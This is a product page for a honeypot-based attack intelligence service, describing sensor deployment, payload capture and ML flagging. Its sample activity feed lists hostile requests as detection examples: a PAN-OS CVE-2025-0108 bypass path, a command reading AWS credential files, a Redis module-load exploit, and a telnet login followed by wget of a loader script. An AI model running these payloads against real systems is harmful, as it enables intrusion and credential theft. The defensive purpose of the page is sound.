New research How Rover caught a PAN-OS authentication bypass attempt (CVE-2025-0108) Baku · Dubai

Let attackers hit a decoy first.

Attack Intelligence runs Siren honeypot sensors: systems that look like real services and record everything sent to them. Some sit on our global network, and you can install your own at the edge of your network or inside it. Each capture is classified by what its payload does, and Rover, our ML model, flags the requests that stand out from the usual noise.

Sensor activitylast 24 hours
All 1,598Global 1,284Edge (DMZ) 312Private 2
  1. Global
    Exploit attempt, CVE-2025-0108HighGET /unauth/%252e%252e/php/ztp_gate.php/PAN_help/x.cssfrom 198.51.100.23Rover flagged
  2. Global
    Credential-file grabHighPOST /admin/config cmd=cat ~/.aws/credentialsfrom 203.0.113.71 / claims to be GPTBot
  3. DMZ
    Redis exploitationCriticalMODULE LOAD /tmp/exp.sofrom 198.51.100.140
  4. DMZ
    Botnet loader / C2Criticaltelnet root:admin → wget http://198.51.100.7/cat.shfrom 203.0.113.9 / C2 extractedRover flagged
  5. Private
    Internal host touched a sensorCriticalGET /admin/configfrom 10.0.4.17Rover flagged
Fig. 1 Sensor activity. Attacks recorded by global, edge and private-network sensors, classified by what the payload does. Sample data.
01Why it matters

Real attacks, with the payload attached.

Most intelligence describes an attack after someone else has seen it. A sensor records the attack itself: the request, the payload, where it came from and what it was trying to do.

On the internet, our global sensors get the same scanning and exploitation that every exposed service gets. That shows which vulnerabilities attackers are trying right now and what they try to drop once they're in.

Inside your network the logic is simpler. Nothing legitimate should be talking to a sensor, so anything that does is worth checking.

02Deployment

Sensors where you need them.

Use our global network on its own, or add sensors of your own alongside it.

Global network

Our sensors run across the internet and record the scanning and exploitation that every exposed service receives. You see which exploits and botnet payloads are in circulation without installing anything.

Edge (DMZ)

Install a sensor next to your public-facing systems. It shows who is probing your perimeter and what they send.

Private network

Install a sensor inside your network. It has no real users, so any device or account that touches it is behaving in a way worth checking.

03Evidence

Every capture is kept whole.

The full payload

Sensors keep the complete request and payload, not a summary, so you can see exactly what was sent.

Classified by behavior

Each request is classified by what its payload does, for example a botnet loader or a grab for credential files. A User-Agent or any other header an attacker can fake doesn't change the verdict.

Indicators pulled out

C2 endpoints and download URLs are extracted from the payload and kept as evidence.

ML on the noise

Most traffic to a sensor is routine scanning. Rover, our ML model, flags the requests that deviate from that background, so the unusual ones don't get lost.

04How it works

From a request on a sensor to an answer.

  1. 1

    Deploy

    Start with the global network, then add sensors at your edge or inside your network if you want them.

  2. 2

    Capture

    Sensors record every request sent to them, with the full payload.

  3. 3

    Classify

    Each capture is classified by behavior, and Rover flags whatever stands out.

  4. 4

    Investigate

    Review your sensor activity in Cypho, or ask the AI Assistant about it.

05Questions

Things people ask about Attack Intelligence.

What is a honeypot sensor?

A system that looks like a real service, such as an admin panel or a database, but has no real users. Whatever is sent to it is recorded and analyzed.

Do we have to install anything?

No. The global sensor network works without anything on your side. Sensors at your edge or inside your network are optional, and run in the network you install them in.

How is this different from Threat Intelligence?

Threat Intelligence collects what others publish and discuss: forums, leaks, feeds and CVEs. Attack Intelligence comes from our own sensors, so you see attacks as they are sent, with the full payload.

Where do your research posts come from?

Many come from these sensors. When a capture is interesting, our research team takes it apart and publishes what it finds.

Unknown threats are unstoppable. Until we expose them.

Send us your company domain. We'll walk you through what's already out there about you and how Cypho would handle it, with one of our analysts on the call.

Or write to [email protected]

We'll use your details to respond to your request. See our privacy policy.